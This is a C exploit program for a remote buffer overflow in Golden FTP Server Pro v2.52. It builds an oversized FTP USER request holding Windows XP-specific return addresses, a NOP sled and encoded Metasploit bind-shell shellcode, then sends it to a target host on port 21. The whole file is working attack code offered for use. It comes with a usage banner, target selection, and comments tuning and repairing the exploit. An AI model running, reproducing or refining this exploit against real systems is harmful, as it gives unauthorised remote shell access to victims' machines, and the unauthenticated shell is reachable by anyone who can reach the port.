
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and metasploit
* Usage: exploit <targetOs> <targetIp>
*        targetOs: 1 = WinXP SP1 English, 2 = WinXP SP2 English (see target[] below)
*
*/
  12.  
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. The shell does not appear on the
* USER/PASS exchange itself: afterward, someone on the server must right-click
* the Golden FTP Server Pro icon in the Windows tray and click Statistic.
* Only then does the payload run and open a bind shell on port 4444.
* Note that the bind shell is unauthenticated: any host that can reach
* TCP 4444 on the target gets the shell, not just the attacker.
*
*/
  25.  
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")
  30.  
/*
 * First piece of the request: the FTP USER command followed by the run of
 * 'A' bytes that overruns the server's username buffer.  The length of the
 * padding is what places the 4-byte return address (appended in main())
 * where the saved return address sits in v2.52; it is version-specific, so
 * do not change it without re-finding the offset.
 */
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  41.  
/*
 * Return addresses, one per supported target (index = targetOs - 1).
 * Each entry is a little-endian pointer to a "jmp esp" instruction at a
 * fixed address in the named XP build (per the original author's note).
 * The bytes contain no 0x00, which main() relies on when it concatenates
 * the request as a C string.  These addresses are specific to the listed
 * service pack and language; on any other build the address is wrong and
 * the server will most likely just crash instead of running the payload.
 */
char *target[] = {
    "\xFC\x18\xD7\x77", /* 1: Windows XP SP1 English, jmp esp */
    "\xBF\xAC\xDA\x77", /* 2: Windows XP SP2 English, jmp esp */
};
  47.  
/*
 * Payload: Metasploit win32_bind, 348 bytes, PexFnstenvSub-encoded (see the
 * generator comment below).  On the victim it listens on TCP 4444 and hands
 * a shell to whoever connects first; there is no authentication, so any
 * host that can reach that port gets the shell, not just the attacker.
 * EXITFUNC=seh is the exit method selected when the payload was generated.
 *
 * The bytes are encoded and cannot be audited by reading them; if this is
 * ever reused, regenerate the payload from a trusted Metasploit install
 * rather than trusting a blob copied out of an archive.  It must stay free
 * of 0x00 bytes: main() assembles the request as a NUL-terminated C string.
 */
char shellcode[] =
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";
  72.  
/*
 * 24-byte NOP sled placed between the return address and the shellcode,
 * intended to absorb small variations in where esp points after the
 * "jmp esp".  NUL-terminated like the other pieces so the C-string
 * handling in main() measures it correctly.
 */
char nops[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90";
  76.  
/* Second FTP command appended after the oversized USER line: an empty password. */
char passreq[] = "PASS " "\r\n";
  79.  
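/*
 * Assemble the single FTP request that triggers the overflow:
 *
 *   "USER " + 'A' padding   (userreq)
 *   + 4-byte return address (ret, one entry of target[])
 *   + NOP sled              (nops)
 *   + shellcode
 *   + "\r\n"
 *   + "PASS \r\n"           (passreq)
 *
 * Lengths come from sizeof() on the arrays and strlen() on ret, and the
 * pieces are copied with memcpy(), so the request is never cut short by an
 * unexpected 0x00.  *out_len receives the number of bytes to send (the
 * terminating NUL added for convenience is not counted).
 *
 * Returns a heap buffer the caller must free(), or NULL if malloc() fails.
 */
static char *build_payload(const char *ret, size_t *out_len)
{
    const size_t ret_len  = strlen(ret);            /* target[] entries are 4 NUL-free bytes */
    const size_t user_len = sizeof(userreq) - 1;
    const size_t nops_len = sizeof(nops) - 1;
    const size_t code_len = sizeof(shellcode) - 1;
    const size_t pass_len = sizeof(passreq) - 1;
    const size_t total = user_len + ret_len + nops_len + code_len + 2 + pass_len;

    char *buf = malloc(total + 1);
    if (buf == NULL) {
        return NULL;
    }

    char *p = buf;
    memcpy(p, userreq, user_len);   p += user_len;
    memcpy(p, ret, ret_len);        p += ret_len;
    memcpy(p, nops, nops_len);      p += nops_len;
    memcpy(p, shellcode, code_len); p += code_len;
    memcpy(p, "\r\n", 2);           p += 2;
    memcpy(p, passreq, pass_len);   p += pass_len;
    *p = '\0';

    *out_len = total;
    return buf;
}

/*
 * Entry point.  argv[1] selects the target (1 = WinXP SP1 English,
 * 2 = WinXP SP2 English, i.e. the index into target[] plus one); argv[2]
 * is the host to attack.  Connects to TCP 21, drains the banner, sends the
 * malicious USER/PASS pair and disconnects.
 *
 * Returns 0 when the request was fully sent and 1 on any error.  A zero
 * exit status only means the bytes went out: nothing here connects to the
 * bind shell, and per the header comment the payload does not run until
 * the Statistic window is opened on the server.
 *
 * Fixes over the original: WSAStartup() failure was never detected ("< 0"
 * on a call that returns positive error codes), an out-of-range target
 * number indexed past target[], the resolve error printed argv[1] instead
 * of the host, malloc()/recv() results were unchecked, a short send() was
 * treated as success, the buffer leaked, and the trailing NUL was sent.
 */
int main(int argc, char *argv[])
{
    WSADATA wsaData;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    SOCKET mysocket = INVALID_SOCKET;
    char rec[1024];                 /* scratch for the banner; contents are not inspected */
    char *evilbuf = NULL;
    size_t evillen = 0;
    size_t sent = 0;
    char *end;
    long targetnum;
    int rc = 1;                     /* flipped to 0 only once the request is fully sent */

    if (argc < 3) {
        printf("\r\nGolden FTP Server Pro Remote Buffer Overflow Exploit\r\n");
        printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)\r\n");
        printf("Exploit coded By ATmaCA\r\n");
        printf("Web: atmacasoft.com && spyinstructors.com\r\n");
        printf("Credit to kozan and metasploit\r\n");
        printf("Usage:\r\nexploit <targetOs> <targetIp>\r\n\r\n");
        printf("Targets:\n");
        printf("1 - WinXP SP1 english\n");
        printf("2 - WinXP SP2 english\n");
        printf("Example:exploit 2 127.0.0.1\n");
        return 1;
    }

    /* argv[1] is 1-based on the command line, target[] is 0-based.  Reject
     * non-numeric input and anything outside the table instead of reading
     * past its end (the original atoi() accepted "0", "3" or garbage). */
    targetnum = strtol(argv[1], &end, 10) - 1;
    if (end == argv[1] || *end != '\0'
        || targetnum < 0 || targetnum >= (long)(sizeof(target) / sizeof(target[0]))) {
        printf("Unknown target \"%s\"; run without arguments for the list.\n", argv[1]);
        return 1;
    }

    evilbuf = build_payload(target[targetnum], &evillen);
    if (evilbuf == NULL) {
        printf("Out of memory.\n");
        return 1;
    }

    /* Winsock 1.1 is enough for socket/connect/send.  WSAStartup() reports
     * failure with a positive error code, so "< 0" could never catch it. */
    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
        printf("WSAStartup failed.\n");
        free(evilbuf);
        return 1;
    }

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if (mysocket == INVALID_SOCKET) {
        printf("Socket error!\r\n");
        goto out;
    }

    printf("Resolving Hostnames...\n");
    pTarget = gethostbyname(argv[2]);
    /* Only an IPv4 answer of exactly sizeof(sin_addr) bytes may be copied
     * into the sockaddr; anything else would copy the wrong length. */
    if (pTarget == NULL || pTarget->h_addrtype != AF_INET
        || pTarget->h_length != (int)sizeof(sock.sin_addr)) {
        printf("Resolve of %s failed\n", argv[2]);   /* argv[2] is the host; the original printed argv[1] */
        goto out;
    }

    memset(&sock, 0, sizeof(sock));             /* sin_zero was left uninitialized before */
    sock.sin_family = AF_INET;
    sock.sin_port = htons(21);
    memcpy(&sock.sin_addr, pTarget->h_addr, sizeof(sock.sin_addr));

    printf("Connecting...\n");
    if (connect(mysocket, (struct sockaddr *)&sock, sizeof(sock)) != 0) {
        printf("Couldn't connect to host.\n");
        goto out;
    }

    printf("Connected!...\n");
    printf("Waiting for welcome message...\n");
    Sleep(10);
    /* Drain the banner.  0 means the server already hung up, SOCKET_ERROR
     * a failed read; in both cases sending the request is pointless. */
    if (recv(mysocket, rec, (int)sizeof(rec), 0) <= 0) {
        printf("Server closed the connection before sending a banner.\n");
        goto out;
    }

    printf("Sending evil request...\n");
    /* send() may accept fewer bytes than asked; loop until the whole request
     * is out.  Unlike the original (strlen()+1), the terminating NUL is not
     * sent: it is not part of the FTP command. */
    while (sent < evillen) {
        int n = send(mysocket, evilbuf + sent, (int)(evillen - sent), 0);
        if (n == SOCKET_ERROR || n <= 0) {
            printf("Error Sending evil request.\r\n");
            goto out;
        }
        sent += (size_t)n;
    }

    Sleep(10);
    printf("Success.\n");           /* the request was sent; the shell still needs the server-side trigger */
    rc = 0;

out:
    if (mysocket != INVALID_SOCKET) {
        closesocket(mysocket);
    }
    WSACleanup();
    free(evilbuf);
    return rc;
}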
  160.  